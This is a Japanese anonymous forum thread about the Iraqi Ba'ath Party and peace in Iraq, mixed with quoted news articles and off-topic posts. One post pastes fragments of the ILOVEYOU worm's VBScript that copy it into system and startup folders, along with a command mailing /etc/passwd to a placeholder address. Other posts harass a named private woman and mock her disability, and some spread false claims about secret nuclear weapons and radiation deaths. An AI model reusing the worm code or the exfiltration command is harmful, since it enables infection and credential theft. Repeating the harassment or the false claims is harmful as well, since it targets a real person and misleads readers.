X



バース党抜きのイラク和平は実現できない
0001国連な成しさん
垢版 |
04/05/23 11:07ID:6CiUcq.g
フセインの娘婿が亡命したとき、アメリカは冷淡だった。
フセインの娘婿が生きていれば、やりやすかったはず。
アメリカに戦略なし。
0175国連な成しさん
垢版 |
05/06/27 00:17ID:???
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
0178国連名無しさん
垢版 |
05/07/25 18:05ID:8oSNcu16
>>174 まぁ、細かいことは気にするな。
バース党と表記している時点で間違ってるからな。正しくはバアス党
0180国連な成しさん
垢版 |
05/07/26 03:33ID:???
どうもシリアのバース党が、裏切りに出そうな雲行きもある。
イラン、シリアがいっせいにイラクに攻め込めば、
米軍には勝ち目がないのに、惜しいことだ。
0181国連な成しさん
垢版 |
05/08/26 06:57ID:???
イラク、警察隊襲撃で15人死亡・サドル師派も各地で衝突
http://www.nikkei.co.jp/news/kaigai/20050825AT2M2500325082005.html

 【カイロ=金沢浩明】25日に予定されるイラク新憲法の採決を控えた24日、イラク
各地で武装集団の攻撃が相次いだ。首都バグダッドでは警察部隊が武装集団の
襲撃を受け、AP通信によると少なくとも15人が死亡、59人が負傷した。イスラム教
シーア派過激指導者ムクタダ・サドル師の支持者と他の集団が各都市で衝突しており、
治安は一段と悪化している。

 バグダッド西方では検問所の警察部隊に自爆テロの車が突入した。その後武装集団
が現れてロケット弾などを撃ち込み、銃撃戦も展開した。

 シーア派聖地ナジャフではサドル師の支持者が昨年に閉鎖された事務所を再開しよう
として、地元住民らと衝突した。5人が死亡したとの情報もある。サドル師の民兵は
バグダッドなど数カ所で他のシーア派グループを攻撃しているもようで、衝突が広がって
いる。

 AP通信によるとバグダッド郊外、ティクリート、バクバなどでも道路脇の爆発、迫撃砲
の攻撃、武装集団の銃撃などが相次ぎ、合計で20人が死亡した。 (09:27)
0182国連な成しさん
垢版 |
05/09/19 01:01ID:???
イラク憲法最終草案が完成…国民投票での承認は不透明
http://headlines.yahoo.co.jp/hl?a=20050918-00000114-yom-int

 【カイロ=柳沢亨之】イラク暫定国民議会のシャハリスタニ副議長は18日、
憲法草案修正のための各派間の再交渉の末、最終草案が完成したことを
明らかにした。

 ただ、連邦制導入などに反対するイスラム教スンニ派の主張を十分反映
することはできず、草案が10月15日の国民投票で承認されるかは依然、不透明だ。

 議会は既に最終草案を国連に提出。国連は近く、同草案を数百万枚印刷し、
各家庭に配布する予定。

 副議長らによると、水資源分配に関する複数の条文を、連邦政府の権限を
より強める表現に変えたほか、「イラクはアラブ連盟の原加盟国で、同連盟
規約の順守義務を負う」との表現を加えるなど、スンニ派アラブ人の意向に
若干配慮した。だが、連邦制導入や、フセイン政権時代の支配政党「バース党」
元党員の公職追放政策継続などに言及した条文は、そのまま残した。
(読売新聞) - 9月18日23時19分更新
0185国連な成しさん
垢版 |
06/07/14 05:02ID:GGrxvNlc
おほほほほほどうも鈴木ぶきみ陽子おばさんが飛び出てきましたよ(笑)
0186国連な成しさん
垢版 |
06/07/14 23:02ID:ruTAURsg
0188国連な成しさん
垢版 |
06/11/09 00:34ID:QigxYxjA
>>96
もうすぐ死にますよ
0189国連な成しさん
垢版 |
06/11/09 01:46ID:ppNBGFsQ
アメリカがイラクから撤退するとどうなる?
今の政府で治安維持できるとは思えん。
内戦状態になるんじゃないか?
0190国連な成しさん
垢版 |
06/12/03 03:42ID:5CCIMyCc
こらっ185番のスレ 確かにぶさいくなおばさんだけれどもな やめなさいそういうこと言うのは
0191国連な成しさん
垢版 |
07/01/22 13:50ID:u4wwuEgM
メインステージ中野第二の鈴木陽子おばさん暗いねん あのおばちゃん
0192国連な成しさん
垢版 |
07/08/14 11:17ID:4PDV9V/.
しかし例のメインステージ中野第二の鈴木陽子おばちゃん 家賃・光熱費はもちろん火災保障までおとうちゃんに払ってもらってるみたいだけど幾つやねんあのおばちゃんというか身体障害者(笑)
しかしあんな物体にも平等に太陽はあたるんだよねー
0193国連な成しさん
垢版 |
07/10/23 08:02ID:hnT5rHMU
第2次世界大戦やその後の占領で情報収集、通訳や政策決定に関わった
アメリカの日系人は、ほとんどが経済的要因でアメリカに渡った人やその2世で
戦争後の日本に戻って自分が統治しようとは思っておらず、
アメリカ人としてアメリカのために戦争や占領に協力した。
イラク・アフガニスタンの戦争や占領政策で、同じような働きをして
大きな力を持っているのは、故国から政治亡命した人たち。
自分たちが故国で権力を取り戻すために、
アメリカに協力している(というか、アメリカを利用している)。
その違いが、復興や占領がうまくいっていない原因の一つかなと思う。
0194国連な成しさん
垢版 |
07/11/25 03:32ID:Jexu13Hs
どうもごんだでございます
0195国連な成しさん
垢版 |
07/11/25 04:07ID:Jexu13Hs
ところで鈴木陽子おばさんはまだ生きているのかい?
0196国連な成しさん
垢版 |
07/11/25 10:50ID:V/Timlbc
空前の大恐慌によってほぼ全ての企業がドミノ倒しのように倒産することだろう!

搾取的資本主義体制は花火のように爆発して崩壊する!

アメリカの経済学者 ラビ・バトラ氏

「どんなに遅くとも2000年までに共産主義は断末魔の苦しい革命を経て
崩壊し、2010年までに資本主義は崩壊する。」

「資本主義の崩壊(世界同時大恐慌)は住宅バブル・原油バブルの2つのバブルの崩壊に
端を発するNY株式市場の大暴落から始まるだろう。資本主義は花火のように爆発する。」

「世界同時大恐慌の入り口は2005年。そして2010年までに
『搾取的資本主義』は崩壊するだろう。」

(大恐慌・資本主義の崩壊によって)
「日本と世界は同時に崩壊する。」

ラビ・バトラ氏の恩師、サーカー師

「共産主義は早死にするだろう。資本主義は爆竹のように弾けて終焉するだろう。」

経済アナリスト 藤原直哉氏

「世界同時バブル崩壊によって世界金融システムは麻痺し、日本は飢餓に陥るだろう。」
0197国連な成しさん
垢版 |
08/01/03 12:38ID:KVbd6zIQ
 ミミ彡ミミミ彡彡ミミミミ
,,彡彡彡ミミミ彡彡彡彡彡彡       
ミミ彡彡―――――ヾ彡彡彡
ミミ彡゙A級 ● 戦犯 ミミ彡彡
ミミ彡゙――――――ミミミ彡
ミミ彡 '´ ̄ヽ  '´ ̄` ,|ミミ彡  
ミミ彡  ゚̄ ̄' 〈 ゚̄ ̄ .|ミミ   
 彡|     |       |ミ彡    いくら与党工作員が博士の予言コピペを規制したところで  
 彡|   ´-し`)  /|ミ|ミ     歴史の激流はもはや誰にも止めることはできない。
  ゞ|     、,!     |ソ      間もなく未曾有の世界同時大恐慌が始まることだろう。 
   ヽ '´ ̄ ̄ ̄`ノ /       日本と世界は同時に崩壊する。光は極東の日本から。
    ,.|\、    ' /|、       何、大恐慌で勝ち組連中が都落ち? それは正に俺を支持した
 ̄ ̄| `\.`──'´/ | ̄ ̄`   勝ち組連中の自己責任である!人生イロイロだ!
    \ ~\,,/~  /        この国を想い、この国を壊す。
     \/▽\/
0198国連な成しさん
垢版 |
08/05/25 12:24ID:???
共産主義が崩壊????

うそつくなwwwwwwwwwwwwwwwwwwwwww
0199国連な成しさん
垢版 |
08/06/28 02:40ID:8FaLU2Kw
き続き、修了生541人を代表して理工学研究科 湊 智美さんが「これからも社会人として何事にも諦めずに挑戦していきたい」、卒業生1911人を代表して教育学部 岩村友寛さんが「大学生活で得た貴重な体験を教訓にして、
0200国連な成しさん
垢版 |
08/06/28 03:57ID:5KEgByMw
テスト
0201国連な成しさん
垢版 |
09/12/01 12:05ID:DnGCVzok
上位私大
青山学院大・学習院大・上智大・中央大・津田塾大・東京女子大・日本女子大・東京理科大・
法政大・明治大・立教大・関西学院大・同志社大・立命館大・関西大・★南山大・他
http://www.sundai.ac.jp/yobi/highschool/satenet/htm/level.htm
駿台予備校

難関私立大文系コース
私立大選抜
明治大・中央大・法政大・青山学院大・立教大・★南山大などの全国難関私立大学
http://prep.kawai-juku.ac.jp/daiju/2009/annai/kinki/ma-3.php?keiretu_code=3&class_code=5068&class_detail_code=5068
河合塾 近畿地区

■本部校(東京) 国立・難関私立文系コース
名古屋大・横浜国立大・横浜市立大 筑波大・立教大・★南山大など
■大阪校 国立・難関私立コース
北海道大・名古屋大・滋賀大 大阪府立大・神戸市外国語大・★南山大など
http://www.yozemikikoku.com/cource_list.html
代々木ゼミナール 帰国大学受験コース

「有名私大」グループ……明青立法中・関関同立、学習院、★南山の11大学。
http://www.toshin.com/news/topic.php?id=17
東進

ダイヤモンド社 『大学図鑑』 「名古屋の大学グループ ポジショニングマップ」
http://jkidx.sakura.ne.jp/up/up10/data/up0027.jpg

三大都市圏
http://ja.wikipedia.org/wiki/%E4%B8%89%E5%A4%A7%E9%83%BD%E5%B8%82%E5%9C%8F


三大都市圏の一角・中京圏の私大ではダントツで別格 MARCH・関関同立と肩を並べる大都市圏難関有名私立大学 南山大学万歳!
0203国連な成しさん
垢版 |
10/02/21 01:36ID:ev06DE8w
バース党こそが唯一、イラクに平和をもたらすことができる政党
0204国連な成しさん
垢版 |
10/02/22 14:03ID:???
 ./____/            ∧,, ∧
 |::長妻:::| | ) ) )          (・ω・` ) 大臣と連絡が取れ・・・
 |二二二|/メメメ           U θ U
                 / ̄ ̄T ̄ ̄\
                |二二二二二二二|
                |        |
パシャ パシャ  パシャ パシャ パシャ  パシャ パシャ パシャ パシャ パシャ
   パシャ パシャ パシャ パシャ パシャ  パシャ パシャ パシャ  パシャ  パシャ
 ∧_∧     ∧_∧     ∧_∧    ∧_∧    ∧_∧     ∧_∧
【(   )    【(   )    【(   )   【(   )    【(   )    【(   )
└\ \   └\ \   └\ \    └\ \   └\ \   └\ \
  ノ ̄ゝ     ノ ̄ゝ    ノ ̄ゝ      ノ ̄ゝ    ノ ̄ゝ     ノ ̄ゝ
0205国連な成しさん
垢版 |
10/02/23 00:19ID:VjzQdyCo
バースかっ飛ばせバース♪
ライトへレフトへホームラン♪
0206国連な成しさん
垢版 |
10/02/24 02:41ID:NP7qL5jc
イラクバース党万歳!
0207国連な成しさん
垢版 |
10/02/25 09:54ID:lwz4hgJo
バースの再来や!
0208国連な成しさん
垢版 |
10/02/26 22:53ID:xLC8mHLw
バース党って名前がな。
バアス主義って、イスラム世界が一致団結して白人世界に対抗するって考えだろ。
それが同じイスラム教徒の国に戦争しかけちゃ、周りから嫌われて当然じゃん。
つーか、一致団結の部分を『武力による統一』と解釈したのがイラクバース党ってコトだろ。
少なくともサダムフセインはそう考えてたはず。
0209国連な成しさん
垢版 |
10/02/27 00:52ID:CT6ipuxI
ダバディさん
0210国連な成しさん
垢版 |
10/02/27 00:53ID:CT6ipuxI
ダバディさんダバディさん、それはちょっと違うンダナ。
<クスクス
0211国連な成しさん
垢版 |
10/02/27 02:40ID:3t.X5aDA
バース党

復興党
0214国連な成しさん
垢版 |
2012/09/17(月) 03:18:39.47ID:SC7Lf7l8
実はシリアも同じかもな
0217国連な成しさん
垢版 |
2015/09/18(金) 05:16:09.03ID:M3jTTncm
>>214
アサド大統領を中心に団結するべきだわな。

独裁者でも、テロリストよりかは遥かにマシ!
0218国連な成しさん
垢版 |
2015/11/15(日) 21:38:32.01ID:jbOB2VS2
                   【重大】

       放射能テロ虐殺犯の安倍が、核兵器を密造か!?

三菱商事の核ミサイル担当重役は安倍晋三の実兄、安倍寛信 三菱重工の重役でもあるらしい
これがフクイチで核弾頭ミサイルを製造していた疑惑がある 書けばツイッターで速攻削除されている
https://twitter.com/toka iamada/status/664017453324726272

安倍晋三の兄が関与している三菱重工 核開発疑惑について いくつかツイートしたが、反応がないから変だと思って、自分のタイムラインを調べてみたら、
完全に削除されていた 私のツイートで、安倍政権に都合の悪い情報は速攻削除されている これは驚いた ここまでやるのか
https://twitter.com/toka iamada/status/664016524592574464

先ほど、まだ数分以内に、三菱重工の核開発疑惑について、いくつかツイートしたが、検索しても出てこない 多くの人のタイムラインに出てこない ツイート直後に消されてしまったようだ
https://twitter.com/toka iamada/status/664015521830952960


                   【警告】

          死亡者数、戦時なみの勢いで増加中!!

川崎病の年間患者数、史上最高に 1万5千人を突破、ピーク時を超える 最初の報告は水爆実験後。本当の原因は被曝
震災以降に死亡者数が、第二次大戦に匹敵するほど急増している
厚生労働省によると平成23年から平成25年の累計死亡者数は360万人以上に急増。今の日本は太平洋戦争時の時と同じくらいの勢いで人が亡くなっている
除染袋回収の作業員5人 疲労で動けず、自衛隊など救助  疲労じゃないだろう、被曝障害だろうよ 死んだように眠る人々(写真多数)
http://s.ameblo.jp/kaito000777/entry-12031605335.html

【川島なお美の食べて応援が恐怖すぎる】自宅でも進んで食べて応援
1年後・軽くぶつけただけで肋骨骨折 2年後・眼球から出血は半年に一度 3年後・胆管に腫瘍、血液検査は異状無し 4年後・逝去 夫は片目失明、愛犬もがん
https://twitter.com/2ch_NPP_info/status/648256313571479552

・・・ 今も、原子力緊急事態宣言中… 対策本部長は安倍首相。
0219国連な成しさん
垢版 |
2015/11/15(日) 21:53:21.70ID:buFrLzUQ
アケゲ速報 人殺し 通州事件 スパムブログ 詐欺サイト 天安門事件 ライダイハン 慰安婦 民主党支持 マルチ商法
0220国連な成しさん
垢版 |
2016/01/29(金) 02:14:55.62ID:oNK/21/Y
 
お世話になります。
私、責任者の加茂と申します。以後、宜しくお願い致します。
http://homepage2.nifty.com/e-d-a/scurl/ays.html
 
 http://homepage2.nifty.com/e-d-a/scurl/SW-pos.html
 http://homepage2.nifty.com/e-d-a/scurl/SW-sp.html
 http://homepage2.nifty.com/e-d-a/scurl/SW-BB8.html
 
浪速建設様の見解と致しましては、メールによる対応に関しましては
受付しないということで、当初より返信を行っていないようで、今後につい
てもメールや書面での対応は致しかねるというお答えでした。
 http://www.o-naniwa.com/
このように現在まで6通のメールを送られたとのことですが、結果一度も
返信がないとう状況になっています。
 
 http://homepage2.nifty.com/e-d-a/scurl/ia-1-3.html
 http://homepage2.nifty.com/e-d-a/scurl/ia-2-1.html
 http://homepage2.nifty.com/e-d-a/scurl/ia-3-1.html
 
私どものほうでも現在までのメール履歴は随時削除を致しております
ので実際に11通のメールを頂戴しているか不明なところであります。
 
●クリスタル通り122号室の入居者
●浪速建設 女事務員 南野 東条 ●アパマンショップ八尾店 加茂正樹
 
!!!!!!!!!!!!!!!
0221国連な成しさん
垢版 |
2016/02/17(水) 01:04:17.69ID:QLi7vWPu
ブッシュ、兄のせいで支持率が低いのに、その兄を応援演説に呼ぶ頭の悪さ。本当の馬鹿兄弟。
0222国連な成しさん
垢版 |
2018/03/09(金) 18:44:19.46ID:XcuvxBBI
ユニークで個性的な自宅で稼げる方法
役に立つかもしれません
グーグル検索『金持ちになりたい 鎌野介メソッド』

AQXO9
0223国連な成しさん
垢版 |
2018/08/29(水) 14:54:45.32ID:tJTwvmvz
経済的にも自由が手に入りたいなら「立木のボボトイテテレ」で検索すればいいと思う

ZCH
レスを投稿する


ニューススポーツなんでも実況